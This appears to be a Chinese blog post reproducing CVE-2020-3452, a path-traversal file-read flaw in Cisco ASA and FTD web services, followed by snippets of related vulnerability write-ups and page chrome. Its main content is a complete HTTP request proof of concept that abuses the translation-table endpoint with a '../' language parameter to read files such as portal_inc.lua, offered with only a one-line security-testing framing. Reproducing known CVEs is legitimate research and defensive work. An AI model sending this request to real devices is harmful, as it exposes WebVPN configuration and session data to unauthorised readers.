CVE-2020-3452(CISCO ASA设备任意文件读取漏洞复现)

最新推荐文章于 2024-04-15 19:05:33 发布
原创 最新推荐文章于 2024-04-15 19:05:33 发布 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种使用特定POC进行网络抓包的方法。通过构造特定的HTTP请求头来实现对目标系统的抓包测试。该方法适用于安全测试及漏洞验证场景。

抓包
在这里插入图片描述
POC

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

复现CVE-2020-3452CISCO ASA远程任意文件读取
记录并分享学习安全的知识点..
04-27 1314
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 漏洞等级:中危。 二、影响版本 Cisco ASA:<= 9.6 Cisco ASA:9.7 ,...
python工具CISCO ASA设备任意文件读取
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
11-12 290
各家兴便是天下大同
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
Zeker62的博客
12-23 5055
漏洞内容 文件读取漏洞概述: 文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。 本漏洞内容: 思科自适应安全设备 Cisco Adaptive Security Appliance (ASA) 软件和思科火力威胁防御 Cisco Firepower Threat Defense (FTD) 软件的 Web 服务界面中存在漏洞,使得未经身份验证的远程攻击者能够执行目录遍历攻击并读取目标系统上的敏感文件。 简而言之,思科代码对恶意URL的注入过滤
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞复现
tigerOrtiger的博客
07-24 6467
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞 0x01 前言 昨天深夜4点cisco asa 爆出了CVE-2020-3452漏洞,此漏洞可以在未验证的情况下进行任意文件读取。 然后今天早上各大漏洞平台中找各种POC。 但是都只有漏洞通告 于是去推特上一看,已经有大佬把poc公布出来了。 推特是个好东西 :) LOL 0x02 漏洞信息 根据ciso官方通报的信息来看,【入口: 官方信息】 该漏洞是由于受影响的设备处理的HTTP请求中的URL缺乏正确的输入验证所致。攻击者可以通过将
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
thelostworld
07-23 1438
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一、漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 二、影响范围 以下是CVE-2020-3452漏洞受.
CISCO-CVE-2020-3452-Scanner-Exploiter:CISCO CVE-2020-3452 扫描器和漏洞利用程序
05-29
CISCO CVE-2020-3452 扫描器和漏洞利用程序 它将从 shodan 扫描目标服务器,然后找到存在 CVE-2020-3452(思科自适应安全设备和 FTD 未授权远程文件读取)的易受攻击的服务器。 关于 思科自适应安全设备 (ASA) 软件和思科 Firepower 威胁防御 (FTD) 软件的 Web 服务界面中存在一个漏洞,该漏洞可能允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件。 该漏洞是由于受影响设备处理的 HTTP 请求中的 URL 缺乏正确的输入验证。 攻击者可以通过向受影响的设备发送包含目录遍历字符序列的精心设计的HTTP请求来利用此漏洞。 成功的利用可能允许攻击者查看目标设备上 Web 服务文件系统中的任意文件。 当受影响的设备配置有 WebVPN 或 AnyConnect 功能时,将启用 Web 服务文件系统。 此漏洞不能用于获
CISCO ASA远程任意文件读取漏洞CVE-2020-3452复现
玄道的网安博客
07-30 3208
简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 影响版本 Cisco ASA 设备影响版本: <9.6.1 9.6 < 9.6.4.42 9.71 9.8
CISCO ASA远程任意文件读取
kukudeshuo的博客
01-17 1227
CISCO ASA远程任意文件读取 简介 Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备漏洞描述 Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cook
CVE-2020-3452漏洞复现
windy_ll的博客
11-21 3374
一、前言     前端时间碰到了该漏洞,记录一下! 二、漏洞介绍     该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下: Cisco ASA:<= 9.6 Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14 Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0 三、漏洞复现     首先利用zoomeye或者f
CVE-2020-11651复现
weixin_44576411的博客
12-23 659
CVE-2020-11651(身份验证绕过漏洞) 简述 漏洞原因: SaltStack是python的架构开发工具 但是它的ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,而且还会暴露_prep_auth_info()方法。 漏洞使用方法 攻击者可以通过构造恶意请求,绕过salt master 的验证逻辑,调用相关的未授权功能,从而造成远程命令执行漏洞。 ClearFuncs类处理未经身份验证的请求,并且无意中公开了_send_pub()方法,该方法可用于直接在master服务器上
CVE-2020-0796蓝屏POC 漏洞复现
ltt440888的博客
03-19 6767
微软SMBv3远程代码执行漏洞CVE-2020-0796) 1、漏洞描述 微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaC...
CVE-2020-10977复现过程
weixin_39811856的博客
11-30 2071
老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 POC: #!/usr/bin/env python3 import sys import jso.
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1394
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
cisco设备信息泄漏漏洞案例【二】
蚁景网安学院
10-28 3170
前言上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备漏洞案例。CISCO-UCM ConfigFileCacheList.txt 泄漏CISCO-UCM 全称Cisco Unified Communications Manager,是用于集成CISCO的语音视频通话、消息传递和移动协作的基础设施部分 CUCM 服务器在端口 TCP/6970 上有一个...
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6(2),2024年最新面试题+笔记+项目实战
最新发布
04-15 2077
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
ThinkPHP漏洞合集(专注渗透视角)
热门推荐
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值